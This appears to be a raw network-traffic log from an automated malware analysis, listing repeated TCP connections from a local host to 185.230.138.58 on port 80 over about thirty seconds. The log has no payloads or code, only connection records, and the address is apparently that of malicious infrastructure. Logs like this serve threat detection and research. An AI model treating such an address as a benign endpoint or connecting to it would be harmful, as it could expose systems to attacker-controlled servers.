                                                                                                                                        Dec 21, 2024 10:08:37.779618025 CET4987880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:37.976358891 CET8049878185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:38.029506922 CET4987880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:38.102684975 CET4987380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:38.105226994 CET4987880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:38.105459929 CET4988480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:38.225080013 CET8049884185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:38.225157976 CET4988480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:38.225266933 CET4988480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:38.225337029 CET8049878185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:38.225394964 CET4987880192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:38.344999075 CET8049884185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:38.576462984 CET4988480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:38.696113110 CET8049884185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:39.408174038 CET4988780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:39.408626080 CET4988480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:39.468468904 CET8049884185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:39.468547106 CET4988480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:39.556204081 CET4989180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:39.623811007 CET8049887185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:39.623898983 CET8049884185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:39.623955011 CET4988780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:39.623976946 CET4988480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:39.624073982 CET4988780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:39.743743896 CET8049891185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:39.743832111 CET4989180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:39.744057894 CET4989180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:39.746011019 CET8049887185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:39.863720894 CET8049891185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:39.982688904 CET4988780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:40.092080116 CET4989180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:40.104551077 CET8049887185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:40.104979038 CET8049887185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:40.214052916 CET8049891185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:40.884989023 CET8049887185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:40.935710907 CET4988780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:40.988563061 CET8049891185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:41.029460907 CET4989180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:41.120949984 CET8049887185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:41.170093060 CET4988780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:41.228382111 CET8049891185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:41.279481888 CET4989180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:41.353775024 CET4988780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:41.353987932 CET4989180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:41.354140043 CET4989380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:41.473771095 CET8049893185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:41.473803997 CET8049887185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:41.473885059 CET4989380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:41.473905087 CET4988780192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:41.474030972 CET4989380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:41.474116087 CET8049891185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:41.474176884 CET4989180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:41.593492985 CET8049893185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:41.826452971 CET4989380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:41.947530985 CET8049893185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:42.720627069 CET8049893185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:42.763840914 CET4989380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:42.956352949 CET8049893185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:42.998214006 CET4989380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:43.096745014 CET4989980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:43.216401100 CET8049899185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:43.216495991 CET4989980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:43.216661930 CET4989980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:43.336194992 CET8049899185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:43.586808920 CET4989980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:43.706394911 CET8049899185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:44.461427927 CET8049899185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:44.513839960 CET4989980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:44.696238995 CET8049899185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:44.748231888 CET4989980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:44.822860003 CET4989980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:44.823060036 CET4990480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:44.942828894 CET8049904185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:44.942863941 CET8049899185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:44.942975044 CET4989980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:44.943741083 CET4990480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:44.944487095 CET4990480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:45.065890074 CET8049904185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:45.295756102 CET4990480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:45.415409088 CET8049904185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:46.124536037 CET4991080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:46.124802113 CET4990480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:46.190687895 CET8049904185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:46.191766024 CET4990480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:46.244178057 CET8049910185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:46.244710922 CET8049904185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:46.244802952 CET4990480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:46.247741938 CET4991080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:46.311660051 CET4991080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:46.388355970 CET4991180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:46.431248903 CET8049910185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:46.509047031 CET8049911185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:46.511801004 CET4991180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:46.522672892 CET4991180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:46.642385006 CET8049911185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:46.670362949 CET4991080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:46.790393114 CET8049910185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:46.790503979 CET8049910185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:46.873271942 CET4991180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:46.993005991 CET8049911185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:47.494518042 CET8049910185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:47.545104027 CET4991080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:47.728415012 CET8049910185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:47.765808105 CET8049911185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:47.779474020 CET4991080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:47.810729980 CET4991180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:48.000364065 CET8049911185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:48.045120001 CET4991180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:48.120532036 CET4991080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:48.120851040 CET4991180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:48.120852947 CET4991480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:48.240436077 CET8049914185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:48.240494967 CET8049910185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:48.240952015 CET8049911185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:48.241028070 CET4991080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:48.241049051 CET4991180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:48.241193056 CET4991480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:48.241193056 CET4991480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:48.360735893 CET8049914185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:48.592114925 CET4991480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:48.712721109 CET8049914185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:49.485673904 CET8049914185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:49.529508114 CET4991480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:49.720333099 CET8049914185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:49.763895035 CET4991480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:49.839221001 CET4989380192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:49.839342117 CET4976180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:49.839433908 CET4975680192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:49.841213942 CET4991980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:49.960856915 CET8049919185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:49.960935116 CET4991980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:49.961095095 CET4991980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:50.080686092 CET8049919185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:50.311019897 CET4991980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:50.430670023 CET8049919185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:51.223850012 CET8049919185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:51.279531002 CET4991980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:51.456626892 CET8049919185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:51.513885975 CET4991980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:51.571971893 CET4991980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:51.572355032 CET4992480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:51.692795992 CET8049924185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:51.692883968 CET4992480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:51.692943096 CET8049919185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:51.693033934 CET4991980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:51.693104029 CET4992480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:51.813190937 CET8049924185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:52.045223951 CET4992480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:52.165009022 CET8049924185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:52.733680964 CET4993080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:52.733896971 CET4992480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:52.853302002 CET8049930185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:52.853512049 CET4993080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:52.853601933 CET4993080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:52.853868008 CET8049924185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:52.853915930 CET4992480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:52.860488892 CET4993180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:52.973212957 CET8049930185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:52.980258942 CET8049931185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:52.980386019 CET4993180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:52.980463028 CET4993180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:53.100332022 CET8049931185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:53.201668024 CET4993080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:53.321388960 CET8049930185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:53.321521997 CET8049930185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:53.327822924 CET4993180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:53.447427988 CET8049931185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:54.097388983 CET8049930185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:54.139142036 CET4993080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:54.240731955 CET8049931185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:54.295178890 CET4993180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:54.332354069 CET8049930185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:54.373409986 CET4993080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:54.483037949 CET8049931185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:54.529545069 CET4993180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:54.620174885 CET4993080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:54.620217085 CET4993180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:54.620978117 CET4993480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:54.740150928 CET8049930185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:54.740322113 CET4993080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:54.740596056 CET8049934185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:54.740655899 CET4993480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:54.740665913 CET8049931185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:54.740731955 CET4993180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:54.740817070 CET4993480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:54.860291004 CET8049934185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:55.115104914 CET4993480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:55.235960007 CET8049934185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:55.984854937 CET8049934185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:56.029562950 CET4993480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:56.224602938 CET8049934185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:56.279578924 CET4993480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:56.328104019 CET4991480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:56.338655949 CET4993480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:56.338937044 CET4993980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:56.458561897 CET8049934185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:56.458623886 CET8049939185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:56.458686113 CET4993480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:56.458730936 CET4993980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:56.458858967 CET4993980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:56.578502893 CET8049939185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:56.810981989 CET4993980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:56.930969000 CET8049939185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:57.711416006 CET8049939185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:57.766005993 CET4993980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:57.944411993 CET8049939185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:57.998399019 CET4993980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:58.098365068 CET4993980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:58.098453999 CET4994480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:58.217979908 CET8049944185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:58.218036890 CET4994480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:58.218163013 CET4994480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:58.218192101 CET8049939185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:58.218252897 CET4993980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:58.338026047 CET8049944185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:58.576517105 CET4994480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:58.696299076 CET8049944185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:59.343019962 CET4995080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:59.343023062 CET4994480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:59.462580919 CET8049950185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:59.462910891 CET8049944185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:59.463062048 CET4994480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:59.463145018 CET4995080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:59.463335037 CET4995080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:59.464232922 CET4995180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:59.583039999 CET8049950185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:59.583843946 CET8049951185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:59.588007927 CET4995180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:59.588157892 CET4995180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:59.708858013 CET8049951185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:59.810986042 CET4995080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:08:59.931257963 CET8049950185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:59.931298971 CET8049950185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:08:59.936024904 CET4995180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:00.055738926 CET8049951185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:00.706782103 CET8049950185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:00.748370886 CET4995080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:00.835999966 CET8049951185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:00.888988972 CET4995180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:00.944516897 CET8049950185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:00.998403072 CET4995080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:01.069523096 CET8049951185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:01.123402119 CET4995180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:01.183243036 CET4995080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:01.183471918 CET4995480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:01.183568001 CET4995180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:01.303189039 CET8049954185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:01.303288937 CET8049950185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:01.303294897 CET4995480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:01.303452015 CET4995480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:01.303514004 CET8049951185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:01.303544998 CET4995080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:01.303626060 CET4995180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:01.425604105 CET8049954185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:01.655920982 CET4995480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:01.776072025 CET8049954185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:02.547385931 CET8049954185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:02.592144012 CET4995480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:02.784351110 CET8049954185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:02.826519012 CET4995480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:02.902434111 CET4995980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:03.022166014 CET8049959185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:03.022267103 CET4995980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:03.022548914 CET4995980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:03.142143965 CET8049959185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:03.373608112 CET4995980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:03.493180037 CET8049959185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:04.280196905 CET8049959185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:04.326539993 CET4995980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:04.512623072 CET8049959185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:04.560925961 CET4995980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:04.640372992 CET4995980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:04.640604019 CET4996480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:04.762420893 CET8049959185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:04.762480974 CET4995980192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:04.762554884 CET8049964185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:04.762617111 CET4996480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:04.762738943 CET4996480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:04.882213116 CET8049964185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:05.108633995 CET4996480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:05.228368044 CET8049964185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:05.955952883 CET4996480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:05.955965042 CET4997080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:06.048156023 CET8049964185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:06.048218966 CET4996480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:06.075733900 CET8049970185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:06.075822115 CET4997080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:06.075949907 CET4997080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:06.076103926 CET8049964185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:06.076153994 CET4996480192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:06.080305099 CET4997180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:06.195641041 CET8049970185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:06.199836016 CET8049971185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:06.199896097 CET4997180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:06.200023890 CET4997180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:06.319879055 CET8049971185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:06.420540094 CET4997080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:06.540801048 CET8049970185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:06.540829897 CET8049970185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:06.546077967 CET4997180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:06.666639090 CET8049971185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:07.319907904 CET8049970185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:07.446022034 CET8049971185.230.138.58192.168.2.4
                                                                                                                                        Dec 21, 2024 10:09:07.498456001 CET4997180192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:07.514239073 CET4997080192.168.2.4185.230.138.58
                                                                                                                                        Dec 21, 2024 10:09:07.556369066 CET8049970185.230.138.58192.168.2.4
